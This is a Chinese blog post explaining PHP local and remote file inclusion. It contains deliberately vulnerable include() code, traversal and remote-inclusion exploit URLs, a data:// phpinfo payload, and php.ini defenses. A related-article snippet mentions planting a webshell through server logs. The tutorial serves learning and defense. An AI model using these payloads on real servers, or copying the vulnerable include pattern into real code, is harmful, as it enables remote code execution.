php本地文件包含&远程文件包含

最新推荐文章于 2024-08-05 17:02:59 发布
最新推荐文章于 2024-08-05 17:02:59 发布
阅读量7.7k 收藏 3
点赞数 1
分类专栏: web 文章标签: php 文件包含
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/think_ycx/article/details/51084847
版权

由头:面试的时候被问到了,有些东西还是实践的太少,写此博客记录一下。

php文件包含函数:

include()

require()

include_once()

require_once()

本地文件包含:

<?php #存在本地文件包含的代码
	include($_GET['test']);
?>

exploit:

包含当前目录的 lfi.txt(内容为<?php phpinfo();?>):


跨目录包含:

http://localhost:81/lfi/lfi.php?test=../lfi.txt #包含上层目录的lfi.txt文件
http://localhost:81/lfi/lfi.php?test=/lfi_in/lfi.txt #包含内层目录的lfi.txt文件

防御:

防止跨目录:

在php.ini中设置open_basedir

open_basedir = C:\Program Files\phpStudy\WWW\lfi #限制在当前目录下(包括子目录)
open_basedir = C:\Program Files\phpStudy\WWW\lfi\ #限制在当前目录下(不包括子目录)

open_basedir可被绕过:wooyun链接

防止本地文件包含:
使用枚举

$file =$_GET['test'];
switch ($file) {
	case 'lfi.txt':
		include('./lfi.txt');
		break;
	default:
		include('./notexists.txt');
		break;
}
?>



远程文件包含:

<?php
include($_GET['file'].'txt');
?>

exploit:

http://localhost:81/lfi/rfi.php?file=http://ip_address/php/rfi/rfi.txt?

技巧:?被解释成url中的querystring,可用来在 远程文件包含 时 截断 代码中后面内容。

防御:

php.ini配置文件里allow_url_include=off


文件包含利用技巧:

1.远程文件包含时 利用 data://  (>5.2.0) 或者 input://协议

/rfi.php?file=data:text/plain,<?php%20phpinfo();?>


附:php的安全配置

Register_globals =off

Open_basedir

Allow_url_include =off

Display_errors =off

Log_errors = on

Magic_quotes_gpc =off

Cgi.fix_pathinfo

Session.cookie_httponly
think_ycx
关注
专栏目录
本地文件包含&远程文件包含漏洞复现
weixin_45701675的博客
11-20 1286
本地文件包含远程文件包含
php远程文件包含攻击,PHP “is_a()”函数远程文件包含漏洞
weixin_36438028的博客
03-10 243
发布日期:2011-09-23更新日期:2011-09-23受影响系统:PHP PHP 5.3.8PHP PHP 5.3.7描述:--------------------------------------------------------------------------------BUGTRAQ ID: 49754PHP是流行的脚本语言环境。PHP的"is_a()"函数在实现上存在安全漏...
php本地文件包含漏洞,邪恶的空格-PHP本地文件包含漏洞的新突破口
weixin_34649252的博客
03-09 126
来源:茄子乱语PS:文章说的出错鸟,事后剑心提醒我才发现,有忽悠人的嫌疑,Connection HTTP标头和能不能写入空格无关!!记得Zizzy写过一篇《关于php包含Apache日志的随想》,这是一个很好的思路,我们可以随意构造http://www.exp.com/index/**/eval($_POST[cmd]);/**/?>.php这样的GET请求,将一句话木马写入web日志,然后...
【网络安全】本地文件包含远程文件包含漏洞详解
最新发布
goldfish8848的博客
08-05 1115
开发人员将需要重复调用的函数写入一个文件,对该文件进行包含时产生的操作。这样编写代码能减少冗余,降低代码后期维护难度。保证网站整体风格统一:导航栏、底部footer栏等,把这些不会变的东西包含在一个文件中,可以保证整体效果的统一和代码量的减少。
php代码审计文件包含,PHP代码审计之远程文件包含(RFI)
weixin_42512509的博客
03-10 337
有位叫做普瑞斯特的大牛针对PHP的web应用列出了下面几种攻击方式:1.命令注入(CommandInjection)2.eval注入(EvalInjection)3.客户端脚本攻击(ScriptInsertion)4.跨网站脚本攻击(CrossSiteScripting,XSS)5.SQL注入攻击(SQLinjection)6.跨网站请求伪造攻击(CrossSiteRequest...
php本地文件包含漏洞,PHP本地文件包含(LFI)漏洞利用
weixin_36047538的博客
03-09 301
PHP本地文件包含(LFI)漏洞利用这次学习的主要参考资料是:http://downloads.ackack.net/LocalFileInclusion.pdf实验代码:如果是在linux上,直接提交:test.php?for=/etc/passwd即可显示该文件。include($_GET['for'].‘.php’);//用于测试本地包含漏洞?>如果是在win上,提交:test.php...
php本地文件包含 截断,php本地文件包含&远程文件包含
weixin_39888268的博客
03-13 144
由头:面试的时候被问到了,有些东西还是实践的太少,写此博客记录一下。php文件包含函数:include()require()include_once()require_once()本地文件包含:include($_GET['test']);?>exploit:包含当前目录的 lfi.txt(内容为): 跨目录包含:http://localhost:81/lfi/lfi.php?test=....
PHP下载远程文件到本地存储的方法
10-24
使用这些函数时,必须保证PHP环境配置允许远程文件的访问,且PHP代码的执行环境(如服务器配置)安全,避免潜在的安全风险,如远程文件包含(RFI)漏洞。此外,当处理用户输入作为URL或文件名时,必须对这些输入进行...
PHP 网络开发详解之远程文件包含漏洞
10-29
远程文件包含漏洞是指在PHP编程中,攻击者利用PHP的include或require函数的特性来包含并执行远程服务器上的恶意脚本文件。因为PHP的include/require函数既可以包含本地文件也可以包含远程文件,这就为攻击者提供了一...
php 根据URL下载远程图片、压缩包、pdf等文件到本地
10-16
PHP 下载远程文件到本地】 在PHP中,下载远程文件到本地通常涉及使用cURL库或file_get_contents函数。本示例主要讲解如何利用cURL实现这一功能,包括图片、压缩包(RAR和ZIP)以及PDF文件的下载。 1. **基本下载...
php下载远程文件到本地存储的函数类.zip
07-11
1. 初始化下载任务,包括设置远程文件URL、本地存储路径等参数。 2. 处理网络请求,如使用cURL或fsockopen建立连接。 3. 实现断点续传,如果下载中断,可以从上次停止的地方继续。 4. 错误处理,如网络问题、权限...
php远程文件包含漏洞
第二世
04-22 1840
php远程文件包含漏洞2004-3-7作者:Zizzy在这篇文章里我会告诉php远程文件包含漏洞的原理,初涉程序员的人必看。首先的问题是,什么才是”远程文件包含漏洞“?简要的回答是服务器通过php的任意文件包含过滤不严,从而去执行一个恶意文件,这是个程序员过滤上的问题,请记住,所有的cgi程序都有这样的bug。1.找出bug:为了发现目标,我们首先要知道包含两个字的含义,在所有语言里(大多数)
文件包含漏洞—allow_url_fopen和allow_url_include详解
weixin_44431280的博客
02-21 7988
文件包含漏洞_allow_url_fopen和allow_url_include详解 提要:在文件包含漏洞中,PHP脚本环境中php.ini文件中通常会涉及到这两个参数,两个参数的开启或关闭影响文件包含漏洞的利用。 1,参数简介: allow_url_fopen参数(只影响RFI,不影响LFI) 简介:是否允许将URL(HTTP,HTTPS等)作为文件打开处理 allow_url_include参数(只影响RFI,不影响LFI) 简介:是否允许includeI()和require()函数包含URL(HTTP
php代码审计【8】本地包含和远程包含
司徒荆的博客
06-26 737
本地包含和远程包含
PHP获取远程文件的几种方式
weixin_30675247的博客
02-24 109
1.fopen() 2.file_get_contents() 3.fsocket() 4.curl() 转载于:https://www.cnblogs.com/cczhao/p/5213310.html
php写网页如何打开,用php写了一个网页放到了服务器里,如何用浏览器打开这个网页?或者绑定一个端口使访问端口显示网页...
weixin_36047753的博客
03-10 529
已经把网页放到了服务器的apache的目录/var/www/html下面那么浏览器地址栏怎么输才可以打开这个网页那?是线上服务器。。。不是本地的还有可不可以绑定一个端口比如9000,然后有人访问ip:9000就把这个网页显示给他看啊?建立虚拟主机vi /usr/local/apache/conf/vhost/tmp.conf<VirtualHost *:80> #更换端口Documen...
文件包含漏洞相关协议详解
永远是少年
12-13 2533
今天继续给大家介绍渗透测试相关知识,本文主要内容是文件包含漏洞相关协议详解。 一、文件包含常用协议 1、file协议 2、php相关协议 3、zip协议 4、data协议 5、其他协议 二、各协议利用条件
php 怎么远程包含,利用PHP应用程序中的远程文件包含(RFI)并绕过远程URL包含限制...
weixin_33125137的博客
03-18 618
前言文章讲诉了如何绕过远程URL包含限制。在PHP开发环境php.ini配置文件里”,allow_url_include“为“off”的情况下,不允许PHP加载远程HTTP或FTP url包含远程文件。但是使用SMB依旧可以加载。攻击思路攻击者需要配置SMB服务器,启用匿名浏览访问。利用有漏洞的PHP代码从SMB共享里访问PHP Webshell。配置php.ini文件禁用 "allow_url_...
ThinkPHP文件包含远程执行漏洞分析
Fiverya的博客
12-13 1393
文件包含,代码执行漏洞,漏洞编号:QVD-2022-46174
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值